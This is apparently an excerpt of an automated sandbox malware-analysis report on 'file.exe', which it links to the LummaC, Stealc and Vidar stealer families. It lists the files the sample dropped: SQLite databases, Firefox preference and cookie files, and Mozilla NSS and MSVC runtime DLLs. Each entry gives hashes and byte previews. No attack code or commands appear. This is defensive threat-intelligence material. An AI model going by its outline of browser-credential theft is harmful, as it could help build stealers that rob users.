	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\AKECBFBAEBKJJJJKFCGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBGCAFII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBGCAFIIECBFIDHIJKFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DAKEBAKFHCFHIEBFBAFBKFCAEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHCAECGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBFBKFBGIIIDGDGCFCGIIDAKFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFIIIJJKJKFHIDGDBAKJEBKEG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDHDGDHJEGHIDGDHCGCBAKFHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEBGHCBAEGDHIDGCBAEC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
